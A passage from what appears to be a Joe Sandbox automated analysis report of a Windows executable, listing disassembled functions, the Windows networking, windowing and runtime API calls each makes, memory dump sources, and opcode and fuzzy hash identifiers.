                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                                    • String ID: cdecl
                                                                                                                    • API String ID: 3850814276-3896280584
                                                                                                                    • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                                    • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                                    • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                                    • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                                    Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                    • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                                    • _memmove.LIBCMT ref: 0046D475
                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2502553879-0
                                                                                                                    • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                    • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                                    • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                    • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                                    Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32 ref: 00448C69
                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 312131281-0
                                                                                                                    • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                    • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                                    • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                    • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                                    Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastacceptselect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 385091864-0
                                                                                                                    • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                    • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                    • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                    • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                    Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                    • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                                    • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                    • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                                    Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1358664141-0
                                                                                                                    • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                    • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                                    • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                    • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                                    Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2880819207-0
                                                                                                                    • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                    • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                                    • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                    • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                                    Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 357397906-0
                                                                                                                    • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                    • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                                    • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                    • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                                    Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                    • __wsplitpath.LIBCMT ref: 00433950
                                                                                                                    • __wcsicoll.LIBCMT ref: 00433974
                                                                                                                    • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1187119602-0
                                                                                                                    • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                    • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                                    • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                    • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                                    Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1597257046-0
                                                                                                                    • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                                    • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                                    • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                                    • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                                    Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                                    • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 237123855-0
                                                                                                                    • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                    • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                                    • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                    • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                                    Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteDestroyObject$IconWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3349847261-0
                                                                                                                    • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                    • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                                    • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                    • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                                    Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2223660684-0
                                                                                                                    • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                    • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                                    • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                    • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                                    Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                                    • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                                    • EndPath.GDI32(?), ref: 00447336
                                                                                                                    • StrokePath.GDI32(?), ref: 00447344
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
